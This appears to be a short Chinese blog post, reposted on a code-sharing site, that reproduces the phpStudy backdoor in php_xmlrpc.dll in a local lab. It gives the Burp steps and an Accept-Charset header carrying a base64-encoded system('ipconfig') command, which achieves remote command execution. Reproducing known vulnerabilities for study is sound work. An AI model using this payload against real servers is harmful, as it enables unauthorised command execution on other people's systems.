phpstudy后門漏洞復現


前段時間phpstudy被人發現某些版本存在后門,許多人就這樣被當作肉雞長達兩年之久

后門隱藏在程序自帶的phpphp_xmlrpc.dll模塊

影響的版本:phpstudy20162018

 

H:\PhpStudy20180211\PHPTutorial\php\php-5.2.17\ext找到php_xmlrpc.dll

 

notepad++打開,ctrl+f搜索eval

 

 

 

 

 

說明這個版本的phpstudy是由后門的

 

firefox訪問本地ip,用bp抓包,用ctrl+r送到repeater

 

 

 

 

 

 

 

 

 

 

找到accept-encoding,把逗號后面的空格刪掉,deflate后面回車換行,加上accept-charsetc3lzdGVtKCdpcGNvbmZpZycpIDs=,然后go

 

(這是system(‘ipconfig’) ;base64加密)

 

 

 

 

 

漏洞復現成功

 

system(‘path’) ;(分號前面有空格)

 

 

 

安全問題不容小覷啊

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM